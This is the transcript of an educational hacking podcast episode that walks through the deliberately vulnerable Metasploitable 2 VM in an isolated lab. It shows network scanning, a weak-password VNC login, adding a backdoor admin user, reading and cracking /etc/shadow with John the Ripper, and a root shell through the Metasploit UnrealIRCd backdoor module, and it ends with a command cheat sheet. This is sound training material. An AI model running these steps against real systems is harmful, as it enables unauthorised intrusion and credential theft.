In this first real episode we take a look at Metasploitable!
Hello and welcome to episode 1 of the Sudo Social Club. I’m Edward Miro and in this episode I am going to be taking a look at Metasploitable 2.
The Sudo Social Club is a podcast and YouTube channel centered around hacking capture the flags, wargames, crypto-challenges and vulnerable VM’s. I will be recording videos of me completing the challenges and also explaining in detail what I’m doing, why I’m doing what I’m doing and as much information as I can fit into each episode. Each week I’ll be picking a vulnerable VM, challenge or CTF to work through with you. And together we will learn about all the techniques, protocols and workflows to hack all the things. I’m also going to maintain a really good reference page on www.sudosocialclub.com with links, a workflow cheatsheet with all the commands I used and a feed of all my past episodes for you to use anytime you need it.
If anyone has any feedback or recommendations on how I can improve the channel please leave a comment or email me at firstname.lastname@example.org. Stay tuned after the main content for the Sudo Social Club crypto challenge of the week for a chance to get invited to our private Discord server!
Thanks for tuning in, now let’s begin:
So for this weeks episode I thought we should start with the VM that at least to my knowledge started this whole intentionally vulnerable VM thing, Metasploitable 2. From the research I did the original Metasploitable was released back in 2010. The one we’re looking at today is version 2 which was released in 2012 and there is a version 3 that came out in 2016. I picked V2 because that’s the version linked on the Metasploit Unleashed Requirements page.
Like most vulnerable VM’s, it’s always best to set them to run in host-only or NAT mode to keep them segregated from the rest of your network so I went in here to the VirtualBox Host Network Manager and created a virtual adapter that I named NatAdapter, which you can’t see here, but if I show the settings on each of my running VM’s you can see that I selected NAT and then selected my virtual adapter.
Now I know the default login and password for Metasploitable 2 so I could just login in here and run:
and get the IP address, but that wouldn’t be any fun so instead lets pop back over here to the Kali VM and try some scans. Before that as always we will run: clear
apt-get update apt-get upgrade apt-get autoremove
Then we will run:
to get our network information. I’m also gonna put this notepad over here to take notes as we go. We know our Kali machine is sitting at 192.168.56.101 so we’ll assume our target will be somewhere in the 192.168.56.0/24 block.
Lately I’ve been in the habit of running:
before anything else to see what’s on the network. Netdiscover sends out ARP (address resolution protocol) packets which work in the same way DNS resolves IP addresses to domain names on the internet, but with IP address to MAC address on local networks. Routers and switches keep ARP tables of known devices.
So here we can see that we have a host at 192.168.56.102 so we will note that here, but I’m also gonna show how a basic host discovery scan works in Nmap also. If we run:
nmap -sn 192.168.56.0/24
The -sn options tells Nmap not to scan for any open ports and just sends out pings and sees what calls back. This tells us exactly what Netdiscover did and for our purposes today we don’t need to get any deeper with our Nmap host discovery methods. We’ve got our target and now we need to check for what’s running on it. We’ll try the popular TCP SYN scan by running:
nmap -sS 192.168.56.102
and that gives us a Christmas tree of services with open ports that are responding to our scan.
When I started running through what I was gonna do for this episode I found that Metasploitable 2 so is so vulnerable as you can see here that I kind of had choice paralysis and which exploits or techniques to show. If we tried to demo them all this video would be hours long so I instead chose to cherry pick just a few things to give a good introduction.
The first service that caught my eye was 5900/tcp open vnc. I used VNC a lot at one of my former jobs working at a managed services provider, which if you aren’t familiar with what MSP’s do, the one I worked at had clients that were small to medium companies that didn’t have a fulltime IT guy, so they’d contract with us and we’d take care of all their IT/server administration remotely using RDP, VNC and other remote desktop tools.
and when prompted for the password, I’m gonna take a shot in the dark and try “password”. And we’re in. I can see from the shell that popped up on this desktop that I’m logged in as root. This is very useful. I’m gonna go ahead and set us up with our own root level user so we can do whatever else we want. I’m running:
sudo adduser <username> sudo adduser <username> sudo
adduser <username> admin
Cool. So now let’s exit VNC and login to the target via SSH by running:
I’ll also run:
To make sure I’m good with the permission I setup before when we were on VNC. Looks like we’re good to go so I think next it might be fun to crack the passwd and shadow files with John the Ripper.
The passwd file stores user names, user identifier number, group identifier number, path to home diretory etc. The shadow file is where the user’s password hashes are stored. We can cat each of these files:
Remembering to use sudo cat for the shadow file:
sudo cat /etc/shadow
Save each of them on our machines in the notepad and use:
unshadow passwd shadow > loot
To combine them into a single file matching usernames and hashes, then we can us John the Ripper to crack the hashes by running:
john --show loot
Well that was easy. So now we have way more information than we need, but we’re gonna end this session today by showing how to use a Metasploit exploit to get a shell by exploiting a backdoor in the UnreaIRCD IRC daemon. As we can see we have irc running on port 6667 and if you Google “irc 6667 exploit” the first result is this CVE-2010-2075 write up on Rapid7 - UnrealIRCD 184.108.40.206 Backdoor Command Execution.
It even gives us a handy little workflow of commands at the bottom. We start Metasploit by running:
Then once Metasploit is running we enter:
We then define the target IP address by entering:
set RHOST 192.168.56.102
Then we launch the exploit by typing:
It’s that simple. If I enter:
We see that we are root and have a reverse shell into our target machine. It’s really that easy folks.
Well I’m gonna go ahead and end today’s episode here. I think we’ve covered a fair amount of the basics needed to get started and in the future it won’t be quite as easy at Metasploitable 2 has made it for us, but this was just an introduction and a way to test our tools and make sure our attack platform is working as intended.
If you check out the show notes at sudosocialclub.com I have this complete transcript including a bit at the end with just a list of the commands as an easy cheat sheet for anyone trying this at home.
apt-get update apt-get upgrade apt-get autoremove ifconfig netdiscover -r 192.168.56.0/24 nmap -sn 192.168.56.0/24 nmap -sS 192.168.56.102 xtightvncviewer 192.168.56.102:5900 sudo adduser ssc sudo adduser ssc sudo adduser ssc admin ssh email@example.com groups cat /etc/passwd sudo cat /etc/shadow unshadow passwd shadow > loot john --show loot msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOST 192.168.56.102 exploit
Now onto this weeks crypto challenge! If you want attempt this week’s challenge go to www.sudosocialclub.com and click on this week’s episode and scroll to the bottom for the cipher text. If you think you solved it send me an email at firstname.lastname@example.org and I’ll invite you to join our Discord server so you can chat with me and other listeners like yourself.
65 73 6a 6f 6c 20 62 6d 6d 20 75 69 66 20 63 70 70 61 66 20 69 62 64 6c 20 62 6d 6d 20 75 69 66 20 75 69 6a 6f 68 74
If you like this week’s episode and want to help support this channel please subscribe to the podcast through whatever podcatcher you found me through and please subscribe to the YouTube channel. Links to everything on www.sudosocialclub.com, including transcripts, and if you want to help the channel grow please share on your social media. Once again I’m Edward Miro and you can contact me at email@example.com with any comments, questions, corrections or feedback including ideas for future episodes. Thanks for checking out the Sudo Social Club. Have a great week!